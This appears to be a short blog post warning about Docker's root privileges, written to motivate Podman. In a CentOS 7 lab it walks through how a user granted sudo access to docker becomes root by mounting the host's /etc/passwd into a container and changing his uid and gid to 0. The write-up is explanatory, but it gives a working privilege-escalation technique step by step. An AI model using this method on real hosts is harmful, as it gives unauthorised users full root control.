Using Docker to get root access

In my previous post I mentioned that I am learning about Podman, a tool for running containers that does not require a daemon process (like the Docker daemon) or root privileges.

In this post I would like to demonstrate why running containers with root privileges could be dangerous.

Setup

For my demonstration, I have a CentOS 7 host running on VirtualBox. I have installed Docker and started the Docker daemon via the following steps:

sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install docker-ce
sudo systemctl start docker

Next, I will create a new user, Bob Billiards:

sudo useradd -u 8888 -c "Bob Billiards" bbilliar

I will let Bob run the docker command via sudo:

sudo visudo -f /etc/sudoers.d/docker
bbilliar     ALL=/usr/bin/docker

Test 1 – Confirm user is able to run Docker via sudo

[bbilliar@centos7 ~]$ sudo docker run --rm -it alpine sh
/ #

Bob is able to run Docker via sudo, as expected.

Test 2 – Publish a privileged port

This time, Bob is going to publish port 80, a privileged port. This may be unexpected, but Docker runs with root privileges:

[bbilliar@centos7 ~]$ sudo docker run --rm -it -p 80:80 alpine sh
/ #

To test that it is really bound to port 80, I started netcat listening on port 80 in the container:

/ # nc -l -p 80

Then I ran curl from the host:

[bbilliar@centos7 ~]$ curl localhost

The request headers appeared in the container, as expected:

GET / HTTP/1.1
User-Agent: curl/7.29.0
Host: localhost
Accept: */*

Test 3 – Share a volume and gain root access

This time, Bob is going to share volumes between the host and the container, specifically he is going to mount the host’s /etc/passwd file as /etc/passwd inside the container:

[bbilliar@centos7 ~]$ sudo docker run --rm -it --volume /etc/passwd:/etc/passwd alpine sh
/ #

From here, edit /etc/passwd and change user bbilliar‘s uid and gid to 0.

Exit the container.

View user bbilliar’s /etc/passwd entry on the host:

[bbilliar@centos7 ~]$ grep bbilliar /etc/passwd
bbilliar:x:0:0::/home/bbilliar:/bin/bash

Logout, and log back in as bbilliar:

Using username "bbilliar".
bbillar@127.0.0.1's password:
Last login: Mon Dec 31 13:38:57 2018 from 10.0.2.2
[root@centos7 ~]#

Bob is now root! This may not be what the administrator expected when giving Bob sudo privileges to run Docker.

Leave a Reply

Your email address will not be published. Required fields are marked *